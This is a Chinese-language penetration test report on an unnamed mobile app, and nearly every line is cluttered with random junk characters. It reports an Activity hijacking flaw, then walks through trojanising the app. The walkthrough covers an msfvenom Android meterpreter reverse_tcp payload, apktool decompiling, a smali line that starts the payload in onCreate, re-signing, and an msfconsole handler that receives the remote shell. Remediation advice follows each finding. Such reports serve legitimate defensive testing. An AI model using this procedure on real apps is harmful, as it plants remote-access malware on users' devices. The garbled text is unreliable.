' ~9 Q! a9 ]* E* Y9 o5 t0 F% H5 s. S* `, G4 i, \' m
, e5 d/ ?! t5 g% p
# J8 Q, F; p5 i) p$ j4 O- [6 A 7 r) D z9 t% }6 G J
0 d3 M5 j( z, ^% h, x
. E' ~* f1 d; Z$ r R4 s
) K1 e: \) r7 ~+ h( {
6 C/ C% \: R! c- p( u5 t4 c/ M
! s L: x1 m9 v2 q! u ) m/ q( y9 ~" w: s9 ]# O; m
- c _/ K g; E9 ~ 表1-2 测试结果
, x1 c! [/ i! N; P2 L( U! _* Z& g: n' i" {
$ D0 \- V9 [/ @/ T
4 ]$ a( k1 `9 h/ W5 N
" N& N/ Y# g& S% u4 E( W4 R5 b( e) e# ` M
+ U/ c/ e. @5 B* o0 M0 j! H3 _ P( B7 M) J- c* W& u- q
8 E" x; B& H# ^; \( I; t4 D$ {* Y
/ E7 O$ {; U4 a: r2 [* s i2 K: _$ A* v* Z# c- G6 F; j
2 检测结果 : V+ g- c- h) r- V! s1 @4 Q- @
! A* N. I: D p9 a6 M! X
. ^9 e: @' w- }8 v
! Q! u2 \, A: m; F# e. c9 P3 F
9 j: Y2 ?! _1 \) O( Z i- v7 W/ `8 l# x, s* o- Q7 K& _
2.1 某某某 5 s6 `8 l+ ` p
4 d: A: u: N6 n) c7 A$ C8 ]1 Q) \
' e+ u) d( \% O& M" [
% i l. f# s2 h2 d h( M
" S3 A9 u# w" \: K( ~7 p0 y
5 W d6 u7 w$ f1 G' W! { 2.1.1检测目标 . q4 C U2 w# ^6 Q% e% b8 ~" V
1 ~6 |2 A! [- B( ~6 [
1 M' r: @: a# {' R6 q) H# E# ]( q
: s" {( U5 N+ w
$ u* M6 X4 J( D9 i5 _; X 目标地址: 某某某某某某APP
, x- Y A2 U. P% w9 m, D1 I* y3 W i$ S7 k
0 L6 K# V6 ]1 Q! c$ [2 o
( H# \$ y$ Y) k. }" o \
6 Y7 }' Q+ R& E4 q/ Q8 f
- {# y* f( l( t" z 2.1.2检测结果
* J) E! C" b. ~) a! E
- ~( D, c3 @, o
' @5 l6 ?4 a# d
1 e+ ?+ A* X' v& Y( b5 I
' e" m2 p8 }+ j# t, }9 V v
' S2 V; Q1 [) l" r$ s- ` 2.1.2.1
6 v# k2 x! W( y8 S& `0 H$ x5 a) H5 J* x0 ~
$ p8 B/ X1 A" c4 x8 `0 C6 P8 @% e+ k
7 q, c" x! `; M! z4 d! k" w
" |: }; d2 `& T6 F& \
. G) h- v1 Y3 i# f1 L 漏洞链接地址:某某某某某某APP
( S9 ~! o( [" v( j6 T
3 |, O( Y! _9 n! @
; A9 s A7 M0 u6 U1 E- v& P2 a
+ _4 E; W$ A, m* R- j1 Y% a
, e6 |4 @- C, m; G" \1 L2 f
$ m: L5 u) a" X7 j3 I # {( l; E: n( R& `; V
8 v/ p: X* r/ U2 f$ V/ A
3 c* e! r& B) N, f
8 G; N: F; Q/ K V& ~ : [2 F. G( j4 h
3 G- }- ^1 X' `5 r! o4 C* k2 Q! m2 \ 漏洞分析及取证: 4 a% z" E, z5 I
; x8 {, z1 _3 \* j
1 |8 M* J) w3 Z- t4 n5 ~' g) N( {# p% F7 K, i A
6 i# E/ m: D: \/ n R! B0 O
* B& w7 a0 O* n" R) {& D9 } 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图:
0 `4 y' H& S! ~; ?# E
! T8 B8 n# N6 i2 P: _* S. R
' l) e' U' f+ U7 ?+ d7 k5 w
% m: E0 m/ V6 x/ K( ]3 e% d# l
$ e2 j0 a- i1 u# M. d: F6 Q9 r* v+ \& Q9 x5 u0 J( |
# h! u6 k) f# e) Y0 ?) Q- d7 l. }6 D9 U; }
) u6 p% A5 s: \
+ \6 e# l: J$ ]2 k * F- e: a: L: ?% I6 ^5 K
7 v2 ^' [7 t1 x& j. k& ~. S
) X+ q& I* b) w3 W' g2 R
) g& T6 C' h1 l6 _
& z X/ N0 O4 X: }0 L! y
8 I2 R/ |$ [* V) K, f
& w5 I0 a# D6 i* E
* G6 h1 u; l6 h, _
7 c- p7 [# | V$ C9 ? `! Z3 z; R
1 O, ~" _% X8 P- D% v. J
0 r4 g- V; \; [6 T$ [' Y' [* [, l' G
" f# I- X/ X3 l0 }9 F ' t) B' f8 o f
3 {9 j: P) N2 c
0 ~, p* M4 G+ T* @. d7 T0 I0 G1 X8 w$ s/ }
0 J N: ^! L: s5 Q/ p: j! g9 C3 X# s) ~% Y- N2 Z: s6 S
( I, r) b$ I& U- ~# d
$ `! C7 z8 a8 y
9 S+ y3 W* ]2 o4 L/ X$ T
+ l Z/ G; t2 F% e! k5 a9 o0 X7 K+ n4 R
" {) _6 p$ j" T$ ^; F6 Y
; X3 K o1 {8 R7 i1 n1 ]& p$ P
$ L9 S9 U' I& H2 C9 R: z& r$ x: A. j! k" Y
漏洞危害:高
$ U/ G9 u. E7 ~' B6 r- O ^$ j6 }8 f$ f$ H4 d3 U2 ]8 ?7 D) Z- v% R& q! ?
* x" b( d% A# e7 @% @
* _ h' i2 A" x& `# [( b! @" c
1 i, x8 ]! J0 e+ E
8 O9 g6 ?5 z4 r) `( H7 D
n/ h* k1 F: e- n- [8 i
% W' M8 a; S0 V1 w' w H 5 l9 N) E. x; z8 T: f
9 w) u7 ~ L9 f" o3 e# K) A ) Q2 D; k7 H# c2 a* m" t
, a( c. ]$ |9 U& A" B |
+ p) ^0 f9 h3 G7 V9 z/ {5 g7 w. L4 t8 w% I7 E
6 m8 [: c2 b' H3 s( l8 [1 m* C
; j1 }8 F# ~6 A 严重程度
' p+ a. K2 w+ \" Q+ h. }
4 |4 D* ^ _. D, P3 r$ R ) t D* A) Y7 _! [- t
# Q" `. T. U" P+ T1 E6 I
| $ F$ i7 }$ W G
1 T4 {6 o+ J+ w* K/ D. I7 x
% {$ ~4 Y% x0 _, ~* O. X' \2 |$ F% w; ?9 |3 _5 P0 [" |; D: B1 P
9 G# l4 h! H3 i+ K& G8 ]. {! S8 o1 `' q2 e( n' o! H3 H2 d
高
8 f' ^6 x, g/ l. f' H% J
! T, }$ j9 l" c( F5 K, w / c/ H8 ~# u4 l, q
S6 D( D6 n, k
|
' c: Z3 Q. Q9 G* c# z) d7 R% {% W/ u+ t3 A$ l1 M
. [$ }! d; }8 R$ F0 d# ^% m7 U$ i. Z S2 L: O* E
7 b; H0 {: B5 K+ p! n3 ~ C/ L
/ o$ I* K6 k9 Q7 ?) f
■
: R: Y" P1 Y6 h' q: o t# ^7 M& L+ W6 Y- F
0 l2 c1 J5 \3 ^# n3 q
X) U: D' X2 D
|
% M$ {4 B5 n8 L& R) i) d# j) l$ [
: T% b1 p8 ^& \# D$ Z$ X/ F" n5 u* D& |! o n5 |- [& z1 h6 C
9 c2 K5 Z$ r" `
0 I: J! t! J# z, V2 k
中
$ W( v! e* J: i7 O5 G( M. @
7 K* n& t5 p3 k; [3 G3 E* K* j1 W& Y 6 [- d; L ?% q' Z) a( ~# a
6 I9 E7 _" N3 _- v9 c |
: s8 R/ o2 F3 G' u% K0 }) b! C& A
% w# z) I9 F) O* m q" j
$ q% M2 k3 R. J7 J1 n
& a! G* `9 i! Y5 ~/ u- } _$ n, r9 s2 G4 c, a
9 D* o$ S* U& p9 d
! n! i5 R( r2 h* I1 z5 M
2 G- ]1 o1 Q& G0 o0 z- |- E: W+ y! N9 a% p1 t$ u3 B( S
| 4 ~' D4 o6 U5 t$ m6 i) y4 w Q
: D2 k: ~( `! s0 U) y7 y
7 S: z M/ U" a" F; K) ?: [% O3 L; z0 d0 t8 n1 H+ B; c+ ]! K' [
7 g/ o. q0 o* W* W
+ _- l U5 Z# E0 \+ w 低 " o( I' T5 E x5 h$ x9 d/ I5 o
) y* ~( ]. k% ~' V. a- b- j
: g& o7 ~( \ _9 r4 T( o. n' N+ Z) i+ M( Z P# z$ h- l" D- K r
| . W8 e! {: B0 G% K& m, h7 U
& x' x1 U0 I( ?0 s- f
- E' V. O$ |- U( u) f6 U0 d
; ^5 v: x- M0 G) A2 l $ r/ m. n9 R) H4 J6 e
: j* b' Y, W' _; x( v; y
" m' q3 b. \, o: Y4 N. n$ V
8 j( Q& M( B/ T$ n
! G. R/ G! `$ Q2 x6 S: W0 m
) [0 b& y7 W; L) d | & j8 V8 n$ |2 g1 ]3 [9 G
; [: v( [3 ]! U- R( R1 ^
1 i, X r+ T- ^$ r. C6 o, n
1 O, t$ p7 N! l2 `3 | $ H3 C1 o7 ^% a% N
8 c+ I' ]8 v% F$ U
6 X* h! }3 z3 r
' I) ]5 l( k3 c t) d+ k1 [4 z. A
: w' h( b# e2 D( E( L+ t8 }
% i O" s9 ^. x# b" q
4 q O1 T1 T4 _% E. C
2 i& ^. @6 [# |. e
( y1 E' N5 ^- Y. ^9 D# q* q: j9 B/ O' _1 W5 `. r
: N" c; ^ x8 c
9 P5 K5 E! V5 \
. ?- i! n& L' z: O: V( {
* F1 m, y9 s ?; Y6 `+ B 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 3 v' v1 M# `3 S1 r' x4 }
1 P1 O$ p1 j* m8 a
: H4 H+ ^; t: h( p* N0 _) J
k: l) w4 a4 `0 p# z. }; F7 D
" I" [; V- X; d; ?1 E' H9 u. ~) y3 {% a V1 l
6 S$ Q% n4 ~3 }, |4 ^, ?
" s/ {5 J$ |+ r% e9 ]% G$ f
& c. T/ H8 o3 ^5 c# G( I6 \4 a0 B" v" b/ X+ N/ m
3 E( o/ g0 ~: [0 ?
& n) }( u) u0 J: X- C" _ $ }# {+ U. @: v6 D' V! Z" G& v* m8 t
; e( y6 s) P3 Z* ^0 e) C# u
5 V6 _5 w: [" r5 w. \4 Y1 y; p
; _, g. K' x; R" v3 M7 X - C* q5 ?2 m8 @1 f
! q+ l; l- Q' C* o# O: a 2.1.2.2
J* c6 O$ x$ [' N/ n7 O; E& V$ x+ W% q8 M/ }4 s1 f
0 N1 q5 D4 x s
$ W& X6 M9 f+ o( J) q% f% u5 [
- M) I8 u# n: A: u; b, x7 W
" v+ X; ]0 X, |4 ^9 i
漏洞链接地址:某某某某某某APP
# B7 |4 G1 ~6 I" k, v9 F {. l0 H) W) r( }
/ @2 p4 I) f9 V
8 a2 e* }* `8 V/ O* f' G' U / j+ Q; ]7 Y6 q# j
8 v `! x0 Y. s+ i! T+ u! r
漏洞分析及取证: + P6 q- N, {4 n- G# S7 Z
8 U: I$ Z O& z( E& @+ S% G
% H3 z. h, z: \3 Y, N w
5 l- O* f1 P, X
' ?; t# _+ h4 R: D" V. g/ v, I3 V' v8 l1 T! i
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
3 U7 e: E' U% L9 T1 G, ~( {" Y. t+ u& |! s
* j' L. o! m% c1 w$ P$ c
H5 I( t+ j& U# S Q
5 j3 _3 H4 Q+ Q+ t( b
: g4 o: H: J R! @5 @ 用Metasploit 生成木马 apk . Z7 o# ?8 l! j
& d7 S5 `8 E6 j( x6 u- ?
% E; D5 K( p' q/ \1 M5 K) \/ [' z: {. b# x, ~% G
4 s5 h) t' r4 t1 q: J
8 E6 F6 Q6 K8 W: K" R% j0 x2 {
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 1 @& e/ h0 {8 z6 t& }8 `
- v& g) J( z$ l7 m- K$ A5 H
8 I( U: P8 y' I7 l. V
0 w/ l; x3 G, {; m: D- b
9 `5 |; Q$ ^1 q% e1 s8 e$ j5 ^' h2 h: {1 F7 n: t6 V
反编译目标apk和木马apk 9 p9 S2 m8 V- d$ V! N
/ X, n2 R3 |1 |. s1 o4 M2 }
9 h1 N: S% \% n. L- A
5 M! e7 g, }! s6 H1 f% y4 |1 j . w: o- x$ T/ q2 V
9 F8 q0 V7 i/ k
apktool d target.apk
' m- M4 D3 e" R1 _* ~
! v; I- Z0 U7 c& K8 m apktool d cockhorse.apk
7 w+ e1 Q- x- s! ^/ b ?1 C/ U1 L( O3 a
8 H3 i( |+ |0 h, \ c
' E% o1 S- \2 ~* Z
F9 J. m& d6 E/ n# A2 w+ N6 S' {, Y
木马 apk 注入目标 apk ( l, M, j6 k, V) O e, [' f) z. d, a
! Z: _6 O0 ?+ ^
% R; I, z- P; v$ L! f8 `
" s- `# B3 @" F) U7 x. K
! Q* ^9 U9 |7 _$ |- v* |3 Y9 }% w3 t5 c+ U! E
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
; Y7 d4 X$ E& K: {
+ k( F x, ? z1 X) m3 w" `
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V / X7 I3 J& k) N$ R1 n: k1 @4 ^
1 ?6 V; C& W n) d9 O# c4 ^
( B8 X {5 { T1 R
; r4 Q$ M5 b) E$ H8 Y4 x+ v: H* `
# }! V1 D5 d2 w& _! |6 C3 C1 K6 \! Y6 ?
将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 4 W! I. @: `( z4 V2 \) k
$ {. w$ _* h! ^: X. [ w
' b5 H* i4 n8 W- r. g9 P5 Y4 F! M: | m8 _9 p# ?
9 X7 u4 x: v8 ^- G' W
5 G' S6 l* K6 \
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
0 }- v0 ]. q* X$ y
( W1 w' p4 ~- s8 T5 L' S
8 u! `6 h0 S: N6 B1 m0 {" c0 ?
1 X2 v0 V; w9 {1 U6 j& N5 q6 R5 \
1 c1 t- t7 ^7 {0 b( H# x& Q2 D: q& b* j7 x3 ^0 \2 C
回编译生成最终 apk $ @* R0 F& ^ X% L+ [* U
$ V& Z& U( i; U- J7 J/ c! m
+ a8 ?5 } |! e9 h9 Y: V
* R m D4 h1 M# m8 E
) }* U8 c' m) D2 O
- c5 ^6 ~, W( e- d4 I( H7 ^ 重新打包
6 l( T* p0 g( o8 J" V% ~ Y( V& V
" J0 X* m3 f# o( ?
; Q( o) Y+ m6 `7 J+ ?- N
% E7 R: B* m. s) u( |6 N
% Y) _/ l* Y8 U) J, C5 ?( _8 P9 Y, Z l+ h5 L6 c8 s: L
apktool b -o repackage.apk target_app_floder
" i0 n9 q! t& R; O
! i0 }5 q. C* n/ I& S
( ]+ M, p1 L$ `
/ }3 J6 s1 Z! A8 C T9 W6 |: \7 f
0 y6 G/ k2 H" \3 F
, _. [* R1 a6 t3 q( c 创建签名文件,有的话可忽略此步骤 % u2 X! n8 F1 W+ w5 z2 y R
" \' q6 [6 u! j
. D% e1 d3 J" \ o; c3 S3 f7 t$ T. H2 q7 ^ n m1 x5 N! q
: {3 R* x( [' r3 l8 p! z7 u- E
- u; W$ s- ^. [; Q: t keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
/ X( R- r1 E& Q% @7 |& v- o5 o; x1 o% B
+ i! o! X' }% G' p1 h8 a6 m U
: d+ ]( o* Q$ r4 u6 c$ D
' R% ^/ R4 F& M& z% L4 U* B
+ g8 A- G# I( \1 _; r' [. G3 m 签名,以下任选其一 4 ], B& f. B4 d4 P" \
& G7 N0 H) n5 k
+ M8 V& o7 j$ n( d3 R9 @6 x( A: ~/ k$ U7 W; V" D8 B2 ^
8 T, q* B% ?& ^9 |6 z
7 T* P* r' X& C: T! _ jarsigner 方式 : N" Q$ M" s) M, `$ d
8 W" F% w; F) Z1 U% R
) O; r& _1 O4 ^- h7 C3 ^* c' i$ _9 b6 e& f7 Y7 X: R
, M. i% F: x5 ^; a; e2 j
c6 k Z X2 l' e
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
- f+ B9 H: w( o/ D# X
# D8 ?/ q) ]+ s1 L
" V" F+ w$ \7 r/ G. V% M. @1 Q" E
$ j+ X) {& z% w: K5 ]9 o& Q# r3 z
' J$ ]6 C1 B: |! N+ E" u2 ?4 c. C0 M/ `% _4 u! j8 ]7 K
apksigner 方式 : i" h# P1 [" N( w, }9 J2 T% U
4 k0 [& a" h& y1 M1 q: c# Q. I3 D0 {
8 |4 L& g1 \- c( {) }6 [! G
" @) S& j4 U, I7 ?/ l2 Z& L f 1 s1 f1 u6 a! v6 F
/ h" ~+ r% x9 X
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk 4 y7 d# W: @ ~& h* ]
0 U7 \7 f# V' ?8 I
0 g2 ^, a2 q3 ~0 e6 W' C Z+ e
: V. u& `1 P/ C% G
( @' E+ O/ e8 z' f* M. f
: e7 U6 d& K: f; F7 I6 N" G
如需要禁用 v2签名 添加选项--v2-signing-enabled false 1 Q/ K9 l3 T% v6 Q) ~- N
3 ]% d, P6 v; I5 Z; q, A
7 E8 z$ N# W, ^, u' q C
, v7 o' ?! h' C0 U
2 A- E; H0 h( l$ M0 L2 z/ f+ n ?0 }4 d" X( b. P8 j) N- N; a
验证,以下任选其一 4 R5 u4 E x) K) p9 T6 l) `
) M4 _1 d2 U! g) w
" e: U, N. d/ m4 n$ Z O8 _
. ~+ q7 a- p+ v$ R2 G. j2 u
1 k9 x' T7 Q6 Q9 b0 s
4 Z) ^! G' @ `3 N jarsigner方式 6 x% H* i- N4 h# N, F2 f
, @' Q' a3 G3 S1 S3 T
3 h$ E" R; C: k1 O
- ^: ^. p( P# L* x , t _( {* I& V% R( N9 U( k; o
' h9 d$ [9 p& t: H( l; R$ R) B jarsigner -verify repackaged.apk " T2 V# s. X) `7 o7 K
& m/ e9 W3 f) p1 A X) o _
/ J% m" K8 c) V) r
3 X, Q6 P! j9 F9 m6 d2 p
; ^: b3 t W' R. \
. r, G+ C6 @! M0 [ apksigner 方式
& _$ O' _6 \; Z6 p$ C9 I: x+ R" i4 q0 Y) V0 x8 m
4 W) [$ ?. R$ i; m7 k4 h& \0 ^5 I
- z0 J( Q4 n1 C7 b
& B+ t. g; [, E( w; C7 {" k' \
apksigner verify -v --print-certs repackaged.apk ! [* f* t. e- Q r! r" D% ^! v
# |) s( G5 ]9 J9 ]9 D
! a- @+ X7 e8 S7 B9 w
0 b- H8 m) y8 o% T+ B
4 ]% Z3 P% {6 b/ C3 p( s) p6 x; z
2 L6 _& L: b0 c6 y. t keytool方式
& h0 \) E; h. V* s
- ?% j# W/ @8 o3 p
( T2 B7 S* d! x2 v8 I8 z6 t9 S
9 P& [6 G T: }. @4 n, ^1 g, f
# P% E3 M- Q6 [9 n a
! G* c3 V" {9 C/ Q- B2 p/ E/ f keytool -printcert -jarfile repackaged.apk
{+ V+ x& O( {1 ?6 A$ X/ l, U" @
, r: t3 Z T4 D- b
2 W5 h" Y$ U% u/ @, ^9 R( J) [( ~% h: h
]& q% k$ d0 Q% E B5 \" D- L( @; {
* o- F$ X" s# c& v( w5 M2 B 对齐 7 Z( ?3 \' A; w1 F/ I% _
# D% ]0 q+ Y2 E! x6 B) u P
) x# \6 H6 S$ x4 G& d
+ R+ E- t# {- o) Z + J0 @. S$ V% _0 n9 {( Y5 q. A
7 G" h3 x. e# h) E" `* G
字节对齐优化 1 _5 O# I' M; E% l! x( a* e
9 i; v/ [5 r9 [8 X C, W+ }
5 }. R8 N6 g8 e. p3 F' m
9 w& T% j1 T! O+ g; }
5 h0 ]* o% r% I- M# ~$ f
$ @6 @* N n! a, j7 [- U' h
zipalign -v 4 repackaged.apk final.apk * q+ n8 s$ G5 t8 k
7 w& b3 ]7 Y% k5 V- [( @( T5 _/ ]
" _/ X' L" c; e: S+ N$ P5 n! I6 H* L5 y) C5 G+ a8 O9 \, T1 S- f- J" g
, r0 M/ z0 }1 z3 v% ~# N& K8 p) u# }/ T* i; ]. T
检查是否对齐
8 z: D0 s6 ?& L' a- m: F; j5 c' C& f: p h
. l% N0 l" ~4 ^2 L$ f7 N
5 X5 z) ]5 G$ D3 w/ T4 Z6 ~5 y# I
* J$ a& i1 B8 ]6 A/ p" T( P
3 o8 b7 f0 @- e; a5 j* `! S( { zipalign -c -v 4 final.apk
. L+ @* C$ b5 i" d+ r1 p6 K7 C( K. q0 H
. h3 W# e5 |9 l. I$ @5 } n7 t
6 M* F& p4 J- v4 t
$ `8 H5 K2 g9 N h7 \9 n, H7 [. y# m. |' j; i
注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 : ~9 w% T& }5 f/ A8 {
P4 B; n) M- u* T% G5 m2 _0 c$ K
) z0 G+ i( M* V" D! j2 G
* p5 M3 a# y" Z% z/ b1 Y% V F; S$ c
$ T- L! X" U* @7 y8 ]5 q- e A, n+ s$ |5 z3 O' c, o1 N: H+ T
启动Metasploit控制台,配置参数等待上线
1 X: B! c# t) X3 _1 u7 w! }6 B* y& N3 ?# s; P" r$ p2 x# V! z. ^
+ i" ?2 G E7 C1 j) B
. c* O( b' b( q" ]
. U$ ?0 C+ N. P
' ^" s$ L* C" C8 G- c* z0 E2 [ 在终端依次输入如下命令 & g' S7 c( p9 K) g' ]( m
: |( ^; c5 J* C- w A% c. V- N
0 x/ C% r6 o- ^; W. Q$ z* P. l k
+ _7 K5 d0 t. C: ?' W6 l) _+ s6 w, n3 r& T! {& r7 }9 _& U
msfconsole 0 T* O2 e6 S/ O6 B# }, g
- {) S' L3 q4 A& T
G+ u o1 ?8 G4 I( k) ?1 r E9 o6 r T* G
@) y: z( k5 h8 P4 A; \8 k
/ B) e! E; G: O: b2 T7 k use exploit/multi/handler
, ~3 P3 G- R. q* d0 n
! V. I, U0 h& c Y, e% ? G; D
' C2 x, b8 p2 ]. I' \/ E& w9 }- T
+ U, k R% U; W# Y) e' y
' `; u- J( A2 X8 T2 ~
6 R0 p7 p& I3 a! x0 o: c; z
set PAYLOAD android/meterpreter/reverse_tcp
# G" K* d! U2 ?0 ?/ b O9 E
* M2 Y: C8 I2 h" r6 `
' d/ T7 @3 v* z: G( d Z
, N* |, }6 y, q- W
( W& z# ]% i }1 X: `: u% I) B
$ P0 Z5 ~- `7 O" | set LHOST 192.xxx.xx.xx 8 g* ~. n( f4 U' g% u$ l
P" K- g7 V2 i7 f9 z
- }. R7 @* a: y& L8 S0 w% H4 j" [& X9 P* L! V# ~; z* J
- z8 ^1 p! H/ Z. F9 A& t6 ?( k) X+ p$ ~0 H2 _
set LPORT 4444 " c$ j0 J1 v( h
' c7 R7 K/ |: C) n
' P+ _2 X# O4 o
# G1 I" U7 t8 }- p. o% i. H 4 Z! e% M( \% V+ D7 g% G) m
) @' U; |9 f5 }3 j2 D
exploit
0 |! I R6 X5 a) h* D; }1 {* W* T3 r( t% O/ x( i
' T" ~/ T# ~8 x3 X8 @' t+ f0 d9 z* a: k0 Y2 Y( J7 L w
6 Y+ K/ g3 P0 X) z
' t% s' s) E; z( [6 t. N( { 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
" d* }* }6 }8 V7 {% O! j6 d
^ ?+ o1 O* L0 w# X8 `+ F' }! `
; k8 c- p6 f E+ v- \
/ v0 |- t0 Y. h) E" g
+ \* Z" j2 p! E& c( J2 C
5 X+ {. x% M/ X1 ]% _1 C7 P I
漏洞危害:中
4 M8 e0 U, b! q; w9 ~% C" }* |, {9 l- f
( D& p1 @- C% V7 i- S
$ c$ p5 P; x1 t9 t
- a2 B x7 i3 U T0 B
# l# Y n% t8 i. t0 \
8 _& ?1 b3 R: m
2 B& q7 F; h8 H; X# O" v 5 i2 }$ D) K; n0 Q. i* C' V
$ S& X& C4 {, s
4 y$ I% h, E/ j# N2 ? M: c3 `
: `2 P, `) A, ]' R2 T0 b
4 Q a- D; L/ g9 \& j5 }9 ^
9 u" H% N; O/ P( _# [ |
8 w- o" t) l7 q: V# k- T P
& G: d/ Y. R+ w5 o & c) W" i" j4 k I# Y* j
1 r- r+ w8 |" N5 h( J: f 严重程度
; \; g9 z. S7 L# f3 B. r4 v& y/ i3 V& b/ @
2 P( q2 m3 z) p% s
6 S! j3 x" S9 M7 [
|
9 Y6 t% R% Q; M* `% i3 f. K1 H1 S4 |1 e* S7 L5 \! v H: w
% Z m! O L7 [2 X+ E7 H5 [/ ~% L( ?1 S! ]( U- S7 i8 }
1 F0 n0 a3 O( u6 ~
3 h0 U( a) o6 ` 高
$ ]4 b1 q4 j. p2 k l+ T$ _6 L2 v
) }: Z8 T$ z1 p
% d" D' F0 m9 O9 D7 e* o, |. }2 L4 v- i& i
| - r. W2 N3 u( w5 F6 f7 c
9 x, Z ~% W5 Z- B \; {
4 e) q4 O. z# Q5 d/ @0 }+ e" @" c3 h6 b
+ ?0 M! W( X' \& ~; \$ w' A2 r' s: ?
■
3 _) }' W, Q" R
, Y: S: `4 |8 W6 W! X5 n
0 |5 c# ^7 \3 f( I' F$ b4 t! k) U2 a$ L; `5 b5 ]+ e: E) x3 ?
| ! M7 z! |$ [1 {
* B3 q y3 N6 a/ ~! Q! R3 J4 J
# Y, {; ]: B& L6 y2 Z4 p$ p& G
* {) X3 ?0 X' `: `# g; ^ L( q9 d \, V8 _& R: R' D
中 / A* y' w) K, Y( V6 u
. {# s- s& v- f
' R6 d# z) t+ `. h+ B* E* t" O/ I' C& k+ h" P
| ( Z' O8 d2 O8 o
$ o4 R( K1 q. b- |. X$ _- E8 t : |- [+ x* Z2 K- R$ P
; I# k2 }1 b) @! L9 \: H5 ]# M7 i
) F0 R X! @% t" v! o! j) q+ I* p* g& N$ D
6 y* A. i, G* f9 q+ t) _* _5 @! }4 p0 I4 O$ H
; K: ~5 c6 @% v* V& q+ s2 E( T
0 z& T, Y8 C# x* ~5 {
/ q/ J$ [! O# G- P; j; c' W& L& y7 }0 p/ q" Z$ W
| 4 h, S6 z5 O" z* n& p' c% R: q
5 Z+ r0 [+ d2 u5 [4 v/ w) g
0 @7 u2 _5 U# l1 Q' a; u" \% ^- r3 q
. f4 a% z- w6 }) T0 E- @5 k& J$ c9 \, {! @- p! A
低 9 H+ I6 \; ?0 W& k
# o% Q8 q |: \9 F; `7 w
0 n2 e0 N F& |7 Y* A" D( n) U3 o+ W$ Y0 S* w
|
( ?9 \' D3 ]) m% x0 w1 l2 V
- _/ q- X' t2 Z0 ~+ k% H# R. k 2 \8 @2 H2 e* O
0 X7 \5 I) Z7 M1 j
/ [, Y. s8 _8 V; m& E# b
( \7 _' b4 ^- A 4 N: Y2 V: O. t. D' P7 H1 Y- q
3 E0 l/ I0 G1 N" R4 U% F6 } + O3 x0 _' }0 m% k
! f) F' n% P% X" \ 8 F( `4 \2 L% _$ p2 g6 V% e
. d( M: {' T6 r% L, v |
: t% W% L* O. a! l" d5 W
6 K. d7 g* }; [0 i; ]
; j+ \) S0 Y$ K+ b) d! q; |
+ F H1 ^+ V' t* X7 e
- Q& z0 N- @$ {& }5 U7 `/ @) T }7 |+ s
& p' e0 D4 |; k4 A0 A" ?" M
6 D6 C# W9 G$ ^" ]0 D, Z
& [( M* i. X1 u) t ?1 B; X- b, P- _" c r
- ]* d0 k1 K. p! j) l4 c, Y* h! a. N' t; V. Y( C! y9 N: e) E! e
; l' X* y+ z$ e$ f# N1 ]: A# ^
9 X& F. S' B" n+ F- |+ z, X
3 W7 w6 r! H0 I! G% U3 D+ h6 V
' w; p3 @/ C4 k* v( { 0 x7 b6 P* K4 [
) w7 n; w/ A4 L! W- j6 u! S 修复方法: 8 r3 A7 t- m! A) }
7 s6 ?7 |4 c! ~5 W( V$ s
f* g$ {. { |* ]; s' h1 a7 Q5 A/ R. j
( J7 X4 g1 v! W/ E0 D! S4 \) j/ z5 \( ]1 Z1 G; B
1.在 APP 启动时应做签名校验防止二次打包。
9 `' H* h( x" S
$ ~' r- c, d' U; W5 z# ]. b
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 * A- w; x3 k& ^' e8 x. G
( K9 T4 {1 Q; i+ A
# {0 V0 t- j/ Z1 X; X- b0 R
6 ^/ B1 m! a1 I( X
* ^( S5 |+ o, b! H$ U0 W# ~0 u# j, A$ v% T) f+ k' k4 B; a/ |+ M
6 R7 M+ R' @* `( X0 `4 |+ m
* b" ]9 u# F! f# d5 ~
1 O ~+ ?& W4 g8 N8 ]- m+ S5 W g3 L& O& b9 q* z
, N# X8 _$ G6 d
" n5 h1 Y5 K" i! V0 o9 w" `3 l K" W - w# d% z- ^/ ]; t
) O6 t% R" g( Q3 ~
7 q3 C g' Q& c5 [5 ~# e! M
8 l: ]) w! ]* ~/ G$ q
3 o6 \2 \# S+ F5 L
( S+ N3 Y; G% ]# I: Y+ h
2 M6 e$ f( u1 F) P* @1 t( b
2 e% n) U- ]& T' \4 s